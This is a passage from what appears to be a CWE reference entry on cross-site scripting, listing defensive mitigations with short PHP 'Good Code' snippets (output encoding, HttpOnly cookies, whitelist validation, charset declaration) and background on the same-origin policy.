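echo '<input type="text" name="q" value="' . htmlspecialchars($untrusted, ENT_QUOTES, 'UTF-8') . '" />';

// URI component: percent-encode before placing it in a query string.
echo '<a href="search.php?q=' . rawurlencode($untrusted) . '">Search again</a>';

// JavaScript section: JSON-encode so the value becomes a safe string literal.
echo '<script>var q = ' . json_encode($untrusted) . ';</script>';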

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Effectiveness: Limited

This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design

Strategy: Parameterization

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

Strategy: Output Encoding

Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.

The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
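
In PHP, for example, one way to remove that ambiguity (a sketch; the declared charset must match the encoding the application actually produces) is to state the encoding explicitly in the HTTP response:

(Good Code)
Example Language: PHP 
// Declare the output encoding so downstream components do not have to guess.
header('Content-Type: text/html; charset=UTF-8');
// The same charset should also be declared in the page's <head> via a meta tag.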

Phase: Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Phase: Implementation

Strategy: Identify and Reduce Attack Surface

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Effectiveness: Defense in Depth
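
For a PHP application using native sessions, a minimal sketch of requesting the HttpOnly behavior described above (it can equally be configured in php.ini):

(Good Code)
Example Language: PHP 
// Ask browsers to withhold the session cookie from client-side script.
ini_set('session.cookie_httponly', '1');
session_start();

// The same flag can be set on individual cookies (7th argument of setcookie).
setcookie('prefs', 'compact', time() + 3600, '/', '', false, true);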

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When dynamically constructing web pages, use stringent whitelists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.

Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because output encoding effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.

Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
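
A minimal sketch of whitelist validation in PHP, assuming (hypothetically) a parameter that is only ever expected to carry a numeric employee ID:

(Good Code)
Example Language: PHP 
$eid = isset($_GET['eid']) ? $_GET['eid'] : '';
// Accept only input that strictly matches the expected format; reject everything else.
if (!preg_match('/^[0-9]{1,8}$/', $eid)) {
    exit('Invalid employee ID.');
}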

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
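
A brief sketch of this strategy in PHP, assuming a hypothetical set of report templates selected by a numeric ID:

(Good Code)
Example Language: PHP 
// Map fixed input values to the actual resources; reject anything outside the map.
$templates = array(1 => 'summary.html', 2 => 'detail.html', 3 => 'archive.html');
$id = isset($_GET['report']) ? (int) $_GET['report'] : 0;
if (!isset($templates[$id])) {
    exit('Unknown report.');
}
readfile('/var/www/templates/' . $templates[$id]); // hypothetical template directory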

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.
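
A short sketch of the implementation-side advice: read request data explicitly from the superglobals rather than relying on variables that register_globals would have created.

(Good Code)
Example Language: PHP 
// Do not depend on register_globals: pull request data explicitly from the superglobals.
$username = isset($_POST['username']) ? $_POST['username'] : '';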

+ Background Details

Same Origin Policy

The same origin policy states that browsers should limit the resources accessible to scripts running on a given web site, or "origin", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or "origins". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce.

Domain

The domain of a website, when referring to XSS, is roughly equivalent to the resources associated with that website on the client side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user's interactions with this particular site.